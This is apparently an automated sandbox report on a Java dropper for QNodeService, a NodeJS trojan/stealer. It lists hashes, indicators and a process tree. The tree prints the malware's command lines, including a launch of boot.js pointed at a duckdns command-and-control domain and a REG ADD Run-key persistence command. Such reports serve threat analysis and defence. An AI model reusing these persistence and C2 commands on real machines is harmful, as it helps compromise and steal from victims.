Analysis
max time kernel: 124s
max time network: 145s
platform: windows10_x64
resource: win10
submitted: 16-10-2020 10:48
Static task: static1
Behavioral task: behavioral1
  Sample: NewOrder101420202.jar
  Resource: win7v200722 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: NewOrder101420202.jar
  Resource: win10 (windows10_x64)
  0 signatures, 0 seconds
General
Target: NewOrder101420202.jar
Size: 119KB
MD5: d2b95d1ab25302ab15dddc817f1ede12
SHA1: c7d520278ac9e409d1890f98e91b28f7bfdd7481
SHA256: c7f25013b32d98d6b2dff1cb775c175956509171d9ae579cc81147da2a6e3d20
SHA512: 4a3452beb8255644715d8ce3d6f0fbfd9dcbc113562b7a7c51c888d27b402bd88596dc7d9d31a26c3dd6ac940f7d662d6ba88aaca2693679f5e7b52ef591efbc
Score: 10/10
Malware Config
Signatures
QNodeService
Trojan/stealer written in NodeJS and spread via a Java downloader.
Executes dropped EXE (3 IoCs)
pid   Process
1020  node.exe
1908  node.exe
2492  node.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\5f244acd-cc44-4da6-aa8f-1cbc177846fe = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe
JavaScript code in executable (3 IoCs)
resource                                      yara_rule
behavioral2/files/0x000100000001ad8c-164.dat  js
behavioral2/files/0x000100000001ad8c-168.dat  js
behavioral2/files/0x000100000001ad8c-172.dat  js
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
20    wtfismyip.com
21    wtfismyip.com
Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe
Suspicious behavior: EnumeratesProcesses (18 IoCs)
pid   Process   hits
1020  node.exe  4
1908  node.exe  4
2492  node.exe  10
Suspicious use of WriteProcessMemory (12 IoCs; each row was recorded twice)
description | pid | Process | procid_target
PID 3104 wrote to memory of 3604 | 3104 | java.exe | 76
PID 3604 wrote to memory of 1020 | 3604 | javaw.exe | 78
PID 1020 wrote to memory of 1908 | 1020 | node.exe | 80
PID 1908 wrote to memory of 2492 | 1908 | node.exe | 81
PID 2492 wrote to memory of 2328 | 2492 | node.exe | 83
PID 2328 wrote to memory of 2732 | 2328 | cmd.exe | 84
Processes (each entry is a child of the one above it)
1. C:\ProgramData\Oracle\Java\javapath\java.exe
   command line: java -jar C:\Users\Admin\AppData\Local\Temp\NewOrder101420202.jar
   - Suspicious use of WriteProcessMemory
   PID: 3104
  2. C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
     command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\492ce0b4.tmp
     - Suspicious use of WriteProcessMemory
     PID: 3604
    3. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
       command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain qhub55.duckdns.org
       - Executes dropped EXE
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of WriteProcessMemory
       PID: 1020
      4. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
         command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_dAT6Qd\boot.js --hub-domain qhub55.duckdns.org
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory
         PID: 1908
        5. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
           command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_dAT6Qd\boot.js --hub-domain qhub55.duckdns.org
           - Executes dropped EXE
           - Checks processor information in registry
           - Suspicious behavior: EnumeratesProcesses
           - Suspicious use of WriteProcessMemory
           PID: 2492
          6. C:\Windows\system32\cmd.exe
             command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "5f244acd-cc44-4da6-aa8f-1cbc177846fe" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
             - Suspicious use of WriteProcessMemory
             PID: 2328
            7. C:\Windows\system32\reg.exe
               command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "5f244acd-cc44-4da6-aa8f-1cbc177846fe" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
               - Adds Run key to start application
               PID: 2732